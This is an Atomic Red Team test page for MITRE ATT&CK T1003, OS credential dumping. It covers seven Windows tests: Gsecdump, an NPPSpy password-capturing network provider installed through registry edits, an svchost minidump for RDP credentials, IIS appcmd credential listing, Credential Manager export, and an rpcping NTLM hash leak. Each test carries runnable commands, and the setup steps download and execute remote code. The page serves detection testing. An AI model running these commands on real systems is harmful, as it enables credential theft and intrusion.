security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1003/T1003.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

337 lines
11 KiB
Markdown
Raw Permalink Blame History

# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6---dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #7 - Send NTLM Hash with RPC Test Connection](#atomic-test-7---send-ntlm-hash-with-rpc-test-connection)
<br/>
## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | string | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{gsecdump_exe}" -a
```
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
```
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
```
#### Cleanup Commands:
```powershell
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: NPPSpy.dll must be available in ExternalPayloads directory
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
```
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
```
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
<br/>
<br/>
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
```
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
<br/>
<br/>
## Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
**Supported Platforms:** Windows
**auto_generated_guid:** 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
#### Attack Commands: Run with `powershell`!
```powershell
rundll32.exe keymgr,KRShowKeyMgr
```
<br/>
<br/>
## Atomic Test #7 - Send NTLM Hash with RPC Test Connection
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
**Supported Platforms:** Windows
**auto_generated_guid:** 0b207037-813c-4444-ac3f-b597cf280a67
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| custom_port | Specify the custom port number | integer | 1234|
| server_ip | Specify the server IP address. If not specified, the loop back IP will be used | string | 127.0.0.1|
#### Attack Commands: Run with `powershell`!
```powershell
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
```
<br/>
Reference in New Issue View Git Blame Copy Permalink